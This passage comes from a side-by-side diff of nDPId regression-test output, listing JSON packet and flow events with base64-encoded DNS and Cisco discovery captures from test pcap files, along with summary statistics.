UP0+cwRub2FhA2dvdgB\/\/xDOV8RlACc0tJNxS+YKsLSQOBQbk6NLsQZG3YDTjO3iKsh7IcLqiw6uOc7SaLs86m+f\/kMHQskW6EQOmEHDMnbqN9IQMGQT4wsBbRrQmwjtM3XaVIfw2QRYEj4dnRSam\/XPSboR6M9\/hOGPVESZ\/uQ6WqFzbJ5fPUcerIlG\/kYoZuwvlZN9eWpmI2uvZVEJoNzzXHVFVxe+gyzQ2fX9CfzbU64wrazKsV4840AxDn9S8jSgjT7wrA1fAbUY1N1Z18MDcPXwCsgNM45SCTA3GR4LZG5q0wfZhRsvLTMW6nxaQfuphvLWLR4kFiw6usfYhcbxye3Gh4WdZwsuqUy1wZUAAQABAAFRgAAEjFoh7cGVABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBgQABAAEAAVGAAASMrBHtwYEAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8FtAAEAAQABUYAABKE3IALBbQAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZUALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBlQAuAAEAAVGAAQ=="} 01871{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1189,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW3YgADURSGKMrBHtzLpQ5QA1nlwKS15OQ2CEEAABAAIABAANDmNhbWVvY2hlbWljYWxzBG5vYWEDZ292AAABAAHADAABAAEAAVGAAAShN0EOwAwALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AIaf94KEuv9ZJnwf0eecIweTnGhU9b8l62tJ68k6dYKJPMmWgU+FCdyf\/QzA4d7evU\/WdY7C1qnmSAKUF\/jv82PtKEXWR9WzExnNSIkYyQ5Ek5HmxOvXRyAbUWYpnmzE31nJFS1DIaj6bHFKKyXa7kbE2lCLrY7Yw5mk7cXQ4OLgm8h\/Rf8PZUuRTxVYvWYo4+TVze1zHc8FD\/ypXkA55QgQpzIh2fdyiGaKmMRm4vEgVKR9qcV84hn2T6W953fnxyCiEAhN7\/HrL8+6Sed3bKvypaRqQ6VyWlurn4p4PS768LrGaurHjeTDHLHyOhT+cpJoI83IpDVd3ZFZXfga1z\/AVwACAAEAAVGAAAgFbnMtbnfAV8BXAAIAAQABUYAACAVucy1td8BXwFcAAgABAAFRgAAHBG5zLWXAV8BXAC4AAQABUYABHAACBQIAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgB\/\/xDOV8RlACc0tJNxS+YKsLSQOBQbk6NLsQZG3YDTjO3iKsh7IcLqiw6uOc7SaLs86m+f\/kMHQskW6EQOmEHDMnbqN9IQMGQT4wsBbRrQmwjtM3XaVIfw2QRYEj4dnRSam\/XPSboR6M9\/hOGPVESZ\/uQ6WqFzbJ5fPUcerIlG\/kYoZuwvlZN9eWpmI2uvZVEJoNzzXHVFVxe+gyzQ2fX9CfzbU64wrazKsV4840AxDn9S8jSgjT7wrA1fAbUY1N1Z18MDcPXwCsgNM45SCTA3GR4LZG5q0wfZhRsvLTMW6nxaQfuphvLWLR4kFiw6usfYhcbxye3Gh4WdZwsuqUy1wZUAAQABAAFRgAAEjFoh7cGVABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBgQABAAEAAVGAAASMrBHtwYEAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8FtAAEAAQABUYAABKE3IALBbQAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZUALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBlQAuAAEAAVGAAQ=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":89,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1155,"global_ts_msec":1495451910684} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":89,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1155,"global_ts_msec":1495451910684}
00686{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":90,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":305,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcoZEgAOcRGZODTlH+zLpQ5QA1hecG1xOqS+SFkwABAAAADAABC0NNSDBTLTUwNjI0BGRhYXMDZGxhA21pbAAAAQABwBgABgABAAAAPwAwCGVhZ2xlaWIxAmFkwB0LcmFuZHkuc21pdGjAHQExm5UAAAC0AAAAEgAJOoAAAAOEwBgALgABAAAAPwCgAAYIAwAAALRZLyttWSHuXTGGBGRhYXMDZGxhA21pbABfZgMcUaz74\/opjmPI6fIN7S4Ga9GN4s2JVqvb0uXXvbdLi9ee5JaFRYVlFB0RVerGRt3pX5esuSlY9ySHVHjOBX09ZI1nwdlSMxmFBY9ZemmmfYIR43tvzwqFnbufNVeL7\/vc0q83XBfNipWbDRE5bz+qVR8="} 00672{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":305,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcoZEgAOcRGZODTlH+zLpQ5QA1hecG1xOqS+SFkwABAAAADAABC0NNSDBTLTUwNjI0BGRhYXMDZGxhA21pbAAAAQABwBgABgABAAAAPwAwCGVhZ2xlaWIxAmFkwB0LcmFuZHkuc21pdGjAHQExm5UAAAC0AAAAEgAJOoAAAAOEwBgALgABAAAAPwCgAAYIAwAAALRZLyttWSHuXTGGBGRhYXMDZGxhA21pbABfZgMcUaz74\/opjmPI6fIN7S4Ga9GN4s2JVqvb0uXXvbdLi9ee5JaFRYVlFB0RVerGRt3pX5esuSlY9ySHVHjOBX09ZI1nwdlSMxmFBY9ZemmmfYIR43tvzwqFnbufNVeL7\/vc0q83XBfNipWbDRE5bz+qVR8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":90,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":271,"global_ts_msec":1495451913554} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":90,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":271,"global_ts_msec":1495451913554}
00424{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":91,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":110,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcXUggADgRPcyY2AuFzLpQ5QA1eM4GFPW9NOaEAwABAAAACAABC3NpcGludGVybmFsA2lycwNnb3YAAAEAASBlZmxia2RtZjJtY241ZWg0ZjB1OW9lZHN2bWFxODA="} 00410{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":110,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcXUggADgRPcyY2AuFzLpQ5QA1eM4GFPW9NOaEAwABAAAACAABC3NpcGludGVybmFsA2lycwNnb3YAAAEAASBlZmxia2RtZjJtY241ZWg0ZjB1OW9lZHN2bWFxODA="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":91,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":76,"global_ts_msec":1495451914068} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":91,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":76,"global_ts_msec":1495451914068}
00931{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":92,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":486,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFKAXcMaIgADQR\/37IE0oVzLpQ5QA1cggHjFp0zlSEEAABAAMABQAKA25zMgZwb3AtcHIDcm5wAmJyAAAcAAHADAAcAAEAAAEsABAoAQCCAAAABgAAAAAAAAAgwAwALgABAAABLAChABwFBAAAASxYVstzWC8+c5NwBnBvcC1wcgNybnACYnIA1\/aeIOiXLVAUlf7X0fXFedFXWKq9aABVNOZ7r5rykMv0fMN9YxDR4Cfp\/zKvuFMArhl0vnp4MXdTgWKEiqk59GY+\/xomF5ijzP3\/hVLiW7e0IYJ1yWiBQh1jhcv34Y3bAKrfDk1MJeqnDbo4Bp88Wdfr5Y21wV56qV8eT6SlXOXADAAuAAEAAAEsAKEAHAUEAAABLFhWy3NYLz5zpzoGcG9wLXByA3JucAJicgCVDEMFJZu9EAXpnfRWZ2RVItWA0n+KJu9IaIVJmIMhajSIQT3VrNMeLfYGRUUl45s\/7N7SoIMSnISlGlhJNpFBgZCcSGA0oztlFfMwzcS\/I5CcKCU3SWRb5uEagRV84Bme6gzJXmBlBbKvNmLJm1Vjve6LCM8hoD8VZqG7vv8jFcEKAAIAAQAAASwABQJuc8EKwQoAAgABAAABLAACwAzBCgAC"} 00917{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":486,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFKAXcMaIgADQR\/37IE0oVzLpQ5QA1cggHjFp0zlSEEAABAAMABQAKA25zMgZwb3AtcHIDcm5wAmJyAAAcAAHADAAcAAEAAAEsABAoAQCCAAAABgAAAAAAAAAgwAwALgABAAABLAChABwFBAAAASxYVstzWC8+c5NwBnBvcC1wcgNybnACYnIA1\/aeIOiXLVAUlf7X0fXFedFXWKq9aABVNOZ7r5rykMv0fMN9YxDR4Cfp\/zKvuFMArhl0vnp4MXdTgWKEiqk59GY+\/xomF5ijzP3\/hVLiW7e0IYJ1yWiBQh1jhcv34Y3bAKrfDk1MJeqnDbo4Bp88Wdfr5Y21wV56qV8eT6SlXOXADAAuAAEAAAEsAKEAHAUEAAABLFhWy3NYLz5zpzoGcG9wLXByA3JucAJicgCVDEMFJZu9EAXpnfRWZ2RVItWA0n+KJu9IaIVJmIMhajSIQT3VrNMeLfYGRUUl45s\/7N7SoIMSnISlGlhJNpFBgZCcSGA0oztlFfMwzcS\/I5CcKCU3SWRb5uEagRV84Bme6gzJXmBlBbKvNmLJm1Vjve6LCM8hoD8VZqG7vv8jFcEKAAIAAQAAASwABQJuc8EKwQoAAgABAAABLAACwAzBCgAC"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":92,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":452,"global_ts_msec":1495451914094} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":92,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":452,"global_ts_msec":1495451914094}
00646{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcZssgAOcRVFmDTlH+zLpQ5QA1TRMGuBtHRUGFkwABAAAADAABCkhRMDFXRUYwMDEDRElSAkFEA0RMQQNNSUwAAAEAAcAeAAYAAQAAA2gALQhlYWdsZWliMcAbC3JhbmR5LnNtaXRowB53sikrAAAqMAAABDgACTqAAAADhMAeAC4AAQAAA2gAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="} 00632{"packet_event_id":1,"packet_event_name":"packet","packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcZssgAOcRVFmDTlH+zLpQ5QA1TRMGuBtHRUGFkwABAAAADAABCkhRMDFXRUYwMDEDRElSAkFEA0RMQQNNSUwAAAEAAcAeAAYAAQAAA2gALQhlYWdsZWliMcAbC3JhbmR5LnNtaXRowB53sikrAAAqMAAABDgACTqAAAADhMAeAC4AAQAAA2gAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451915752} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451915752}
00474{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":204,"global_ts_msec":1495451915752} 00474{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"badpackets.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":204,"global_ts_msec":1495451915752}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 93/0 ~~ packets captured/processed: 93/0
@@ -214,6 +214,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 223 chars ~~ json string min len.......: 209 chars
~~ json string max len.......: 2317 chars ~~ json string max len.......: 2303 chars
~~ json string avg len.......: 1269 chars ~~ json string avg len.......: 1255 chars

42
test/results/capwap.pcap.out
View File

@@ -7,18 +7,18 @@
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1422328963915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328963915,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAEAAP8R8PTAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1422328963915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328963915,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAEAAP8R8PTAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1422328966914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328966914,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAIAAP8R8PPAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1422328966914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1422328966914,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAIAAP8R8PPAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="}
00770{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="} 00756{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328970067} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328970067}
00770{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="} 00756{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328971066} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351,"global_ts_msec":1422328971066}
00770{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="} 